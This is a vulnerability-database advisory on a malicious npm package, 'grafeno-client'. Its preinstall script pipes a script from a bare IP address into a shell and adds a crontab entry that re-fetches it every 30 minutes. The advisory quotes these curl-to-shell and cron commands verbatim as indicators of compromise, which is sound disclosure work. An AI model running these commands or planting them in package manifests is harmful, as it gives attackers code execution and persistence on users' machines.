VDB

GCVE-110-OSM-2026-11286

GCVE-110-OSM-2026-11286
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published August 29, 2026
package.json declares a preinstall script that runs curl against a bare IP over plain HTTP (http://216.126.236.46/x.sh) and pipes the response to sh, giving the remote host arbitrary code execution on the installer at npm install time. The same preinstall appends a crontab entry (*/30 * * * * curl -s 216.126.236.46/x.sh|sh) that re-fetches and re-executes the remote script every 30 minutes, establishing persistence that survives removal of the npm package. The shipped index.js is a stub, so the manifest is the entire payload. Judge assessment: This looks like an installer-stage loader whose attacker goal is remote code execution plus persistence: the package.json preinstall runs `curl -s 216.126.236.46/x.sh|sh` and also adds a `crontab` entry to re-run the payload every 30 minutes. The IOC `216.126.236.46` is classified as a fetched payload source, which matches the OSV advisory and the shell-execution finding, and the shipped `index.js` is just a harmless stub so the manifest is effectively the payload. The combination of a brand-new npm package, a very new publisher account (`usuarioyc`), and no source repository strengthens the case that this is a malicious supply-chain drop rather than a legitimate HTTP client. This should be treated as confirmed malicious infrastructure for drive-by installer compromise on npm install. ENTRY index.js (main: index.js) - Preinstall Script in package.json: ""preinstall": "node -e \"" PERSISTENCE - Cron Job Persistence in package.json: "crontab -" DESTINATION - 1 fetched-payload (ipv4) (values recorded in verified_iocs) EXFIL - Curl/Wget Pipe to Shell in package.json: "curl -s 216.126.236.46/x.sh|sh" ADDITIONAL FINDINGS - Shell Command Execution in package.json: "require('child_process')" - Brand New Package - Very New NPM Publisher Account

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowngrafeno-clientall (affected)

References

advisory
vendor

Browse GCVE Records

1,469 records in the GCVE database · Updated September 3, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›